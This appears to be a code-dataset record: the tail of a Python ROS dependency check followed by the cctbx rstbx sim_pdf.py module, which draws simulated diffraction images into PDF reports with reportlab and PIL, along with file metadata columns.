import rospy # noqa
import std_msgs.msg # noqa
import visualization_msgs.msg # noqa
try:
import rospkg # noqa
import tf2_geometry_msgs # noqa
import tf2_ros # noqa
from tf.msg import tfMessage # noqa
except rospkg.ResourceNotFound:
raise ImportError(
"The rospkg module was found but tf2_ros failed to import, "
"make sure you've set up the necessary environment variables"
)
except ImportError:
print(
f"Some dependencies are not correctly installed. "
f"See the traceback below for more info.\n\n"
f"{traceback.format_exc()}"
)
else:
print("All dependencies correctly installed!")
| 29.064516
| 77
| 0.577137
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 340
| 0.377358
|
af8d86b547c3138c87e5922ed826526a715c832e
| 3,466
|
py
|
Python
|
rstbx/simulation/sim_pdf.py
|
dperl-sol/cctbx_project
|
b9e390221a2bc4fd00b9122e97c3b79c632c6664
|
[
"BSD-3-Clause-LBNL"
] | 155
|
2016-11-23T12:52:16.000Z
|
2022-03-31T15:35:44.000Z
|
rstbx/simulation/sim_pdf.py
|
dperl-sol/cctbx_project
|
b9e390221a2bc4fd00b9122e97c3b79c632c6664
|
[
"BSD-3-Clause-LBNL"
] | 590
|
2016-12-10T11:31:18.000Z
|
2022-03-30T23:10:09.000Z
|
rstbx/simulation/sim_pdf.py
|
dperl-sol/cctbx_project
|
b9e390221a2bc4fd00b9122e97c3b79c632c6664
|
[
"BSD-3-Clause-LBNL"
] | 115
|
2016-11-15T08:17:28.000Z
|
2022-02-09T15:30:14.000Z
|
from __future__ import absolute_import, division, print_function
from six.moves import range
from scitbx.array_family import flex
page_origin = (20.,220.)
boxedge = 500.
class PointTransform:
'''provide the necessary transformation to go from image pixel coordinates
to coordinates on the printed page of the .pdf report'''
def __init__(self,detector_edge):
self.boxedge = boxedge
self.page_origin = page_origin
self.size1 = detector_edge
self.size2 = detector_edge
self.subwindow_origin=[0.,0.]
self.subwindow_fraction=1.
def toPage(self, image_pixel_xy):
image_fractional_coords = ((1.-image_pixel_xy[0]/self.size1),
image_pixel_xy[1]/self.size2)
image_subwindow_coords = ((image_fractional_coords[1]-self.subwindow_origin[1])/
self.subwindow_fraction,
(image_fractional_coords[0]-self.subwindow_origin[0])/
self.subwindow_fraction)
if 0.<image_subwindow_coords[0]<1. and 0.<image_subwindow_coords[1]<1.:
page_coords = (image_subwindow_coords[0]*self.boxedge + self.page_origin[0],
(1.-image_subwindow_coords[1])*self.boxedge + self.page_origin[1]
)
return page_coords
return None
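# Illustrative sketch: with a 768-pixel detector edge and the default
# full-frame subwindow, the detector centre maps to the centre of the
# 500-point box:
#
#     T = PointTransform(detector_edge=768.)
#     T.toPage((384., 384.))  # -> (270.0, 470.0)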
from reportlab.pdfgen.canvas import Canvas
from reportlab.lib.pagesizes import letter
from reportlab.lib.units import cm,mm
class Graph:
def __init__(self,fileout):
self.c = Canvas(fileout,pagesize=letter)
def title(self,text):
print(text)
lines = text.split('\n')
self.c.setFont('Helvetica',12)
self.c.drawString(2*cm,26*cm,lines[0])
if len(lines)>1:
self.c.drawString(2*cm,25.5*cm,lines[1])
def setTransform(self,detector_edge):
#given the raw image fractional coordinates of the subwindow origin
self.T = PointTransform(detector_edge)
def __del__(self):
self.c.save()
class PDF:
def __init__(self,filename):
self.R = Graph(filename)
def make_image_plots_detail(self,ray_sim):
normal = ray_sim.sim.tracing_impacts
self.R.setTransform(ray_sim.detector.raw.focus()[0])
self.R.title(
"%.3f bandpass + %.3f degrees mosaicity (full widths); perfect optics"%(
ray_sim.sim.bandpass,
ray_sim.sim.mosaicity)+
"\nEnergy %4.1f KeV; Detector distance %6.1f mm; Limiting resolution %6.2f Angstrom"%(
(12.398/(ray_sim.camera.lambda0*1E10)),
ray_sim.camera.distance*1000.,
ray_sim.structure.limiting_resolution))
data_array = 255-ray_sim.image
import numpy
try:
import PIL.Image as Image
except ImportError:
import Image
imageout = Image.frombuffer("L",data_array.focus(),
data_array.as_numpy_array().astype(numpy.uint8).tostring(),
"raw","L",0,1
)
self.R.c.drawInlineImage(imageout,x=2*cm,y=9*cm, width=15*cm, height=15*cm)
self.R.c.showPage()
return self
if __name__=="__main__":
data_array = flex.double(flex.grid((768,768)),1.0)
print(data_array.focus())
data_array = flex.double(flex.grid((7,7)),255)
for x in range(7):
data_array[(3,x)] = 0.
data_array[(x,3)] = 0.
try:
import PIL.Image as Image
except ImportError:
import Image
import numpy
args = ("L",0,1)
imageout = Image.frombuffer("L",data_array.focus(),
data_array.as_float().as_numpy_array().astype(numpy.uint8).tostring(),
"raw","L",0,1)
imageout.save("newfile.png","PNG")
| 31.798165
| 89
| 0.671091
| 2,621
| 0.756203
| 0
| 0
| 0
| 0
| 0
| 0
| 428
| 0.123485
|